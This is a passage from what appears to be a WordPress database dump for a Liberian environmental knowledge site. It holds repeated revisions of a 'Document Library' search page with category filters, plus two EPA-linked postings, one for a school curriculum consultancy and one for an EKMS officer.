</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:35:43','2021-08-19 12:35:43','',91,'https://ekmsliberia.info/?p=4202',0,'revision','',0),(4203,42,'2021-08-19 12:40:08','2021-08-19 12:40:08','The objective of the proposed Consultancy is to develop an Environmental Awareness Module/Curriculum Mainstreaming the Rio Conventions (Climate Change, Sustainable Land Management, and Biodiversity) into Secondary Liberian Schools to develop concern and awareness among secondary Liberian student.\n\n<a href=\"http://www.epa.gov.lr/sites/default/files/Terms%20of%20Reference%20Educational%20curriculum%202020%20ORG.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/Terms%20of%20Reference%20Educational%20curriculum%202020%20ORG.pdf</a>','EXPRESION OF INTEREST Reference: EOI-CCCD/EPA-2020-001 the Development of Environmental Awareness Module/Curriculum Mainstreaming the Rio Conventions into Secondary Liberian Schools','','inherit','closed','closed','','3053-autosave-v1','','','2021-08-19 12:40:08','2021-08-19 12:40:08','',3053,'https://ekmsliberia.info/?p=4203',0,'revision','',0),(4204,43,'2021-08-19 12:40:30','2021-08-19 12:40:30','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:40:30','2021-08-19 12:40:30','',91,'https://ekmsliberia.info/?p=4204',0,'revision','',0),(4205,43,'2021-08-19 12:40:30','2021-08-19 12:40:30','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:40:30','2021-08-19 12:40:30','',91,'https://ekmsliberia.info/?p=4205',0,'revision','',0),(4206,43,'2021-08-19 12:40:31','2021-08-19 12:40:31','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 12:40:31','2021-08-19 12:40:31','',91,'https://ekmsliberia.info/?p=4206',0,'revision','',0),(4207,42,'2021-08-19 12:40:54','2021-08-19 12:40:54','The objective of the proposed Consultancy is to develop an Environmental Awareness Module/Curriculum Mainstreaming the Rio Conventions (Climate Change, Sustainable Land Management, and Biodiversity) into Secondary Liberian Schools to develop concern and awareness among secondary Liberian student.\r\n\r\n<a href=\"http://www.epa.gov.lr/sites/default/files/Terms%20of%20Reference%20Educational%20curriculum%202020%20ORG.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/Terms%20of%20Reference%20Educational%20curriculum%202020%20ORG.pdf</a>','EXPRESION OF INTEREST Reference: EOI-CCCD/EPA-2020-001 the Development of Environmental Awareness Module/Curriculum Mainstreaming the Rio Conventions into Secondary Liberian Schools','','inherit','closed','closed','','3053-revision-v1','','','2021-08-19 12:40:54','2021-08-19 12:40:54','',3053,'https://ekmsliberia.info/?p=4207',0,'revision','',0),(4208,42,'2021-08-19 12:42:11','2021-08-19 12:42:11','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>Local Consultant, </strong>who will monitor and supervise the integrated environmental knowledge management system reporting the Rio. The project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities\r\n\r\n<a href=\"http://www.epa.gov.lr/sites/default/files/EKMS%20Officer.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/EKMS%20Officer.pdf</a>','EKMS Officer/Information Technologist Wanted','','inherit','closed','closed','','3051-revision-v1','','','2021-08-19 12:42:11','2021-08-19 12:42:11','',3051,'https://ekmsliberia.info/?p=4208',0,'revision','',0),(4215,43,'2021-08-19 13:16:40','2021-08-19 13:16:40','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 13:16:40','2021-08-19 13:16:40','',91,'https://ekmsliberia.info/?p=4215',0,'revision','',0),(4216,43,'2021-08-19 13:16:40','2021-08-19 13:16:40','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 13:16:40','2021-08-19 13:16:40','',91,'https://ekmsliberia.info/?p=4216',0,'revision','',0),(4217,43,'2021-08-19 13:16:41','2021-08-19 13:16:41','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 13:16:41','2021-08-19 13:16:41','',91,'https://ekmsliberia.info/?p=4217',0,'revision','',0),(4218,43,'2021-08-19 14:07:14','2021-08-19 14:07:14','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 14:07:14','2021-08-19 14:07:14','',91,'https://ekmsliberia.info/?p=4218',0,'revision','',0),(4219,43,'2021-08-19 14:07:14','2021-08-19 14:07:14','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-19 14:07:14','2021-08-19 14:07:14','',91,'https://ekmsliberia.info/?p=4219',0,'revision','',0),(4220,43,'2021-08-19 14:07:15','2021-08-19 14:07:15','<h2>Access environmental reports, 